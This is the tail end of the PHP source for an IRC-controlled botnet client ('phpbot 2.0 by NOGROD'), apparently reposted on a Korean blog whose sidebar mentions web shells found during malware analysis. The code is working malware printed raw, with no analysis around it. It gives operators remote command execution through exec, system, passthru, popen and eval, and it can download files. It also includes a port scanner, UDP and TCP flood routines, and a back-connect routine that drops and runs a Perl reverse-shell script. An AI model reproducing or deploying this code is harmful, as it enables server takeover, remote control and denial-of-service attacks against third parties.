if(!mail($mcmd[1],"InBox Test","#nogRod. since 2008\n\nip: $c \nsoftware: $b \nsystem: $a

\nvuln: http://".$_SERVER['SERVER_NAME']."\n\ngreetz: irc.udplink.net\nNOGROD OWNZ",$header))
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
}
else
{
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
}
}
break;
case "conback":
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) &&

is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd

[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd

[1]));
}
}
break;
case "info":
case "vunl":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".

$_SERVER['REQUEST_URI']."");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; NOGROD.");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "sexec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "passthru":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "popen":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}

case "system":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;

case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open

\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is

\2closed\2");
}
break;
case "ud.server": // .ud.server <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".

$mcmd[2]." Senha: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".

$mcmd[2]);
}
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download.

Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o

download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2

baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download

http://your.host/file /tmp/file"); }
break;
case "die":
$this->send("QUIT :die command from $nick");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
break;
case "udpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");

}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "[X]";
else
$this->nick = "[U]";
}
else
{
$this->nick = "[C]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
}

function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
$dc_source = "";
if (is_writable("/tmp"))
{
if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
$fp=fopen("/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /tmp/dc.pl $ip $port &");
unlink("/tmp/dc.pl");
}
else
{
if (is_writable("/var/tmp"))
{
if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}

}

$bot = new pBot;
$bot->start();

?>

oroi's spot

2012/10/24

프록시 브라우저

2012/10/20

Apple의 Siri와 Android의 Voice Assistant

2012/10/14

윈도우 맥 어드레스 바꾸기

2012/10/11

요즘 cydia에 gcc가 안보인다 싶더니 ㅋ

2012/10/02

예전에 악성코드 분석하다 찾은 perl 웹쉘(pret.jpg)

예전에 악성코드 분석하다 찾은 php 웹쉘(allnet.jpg)

프로필

링크

이전 게시물

아카이브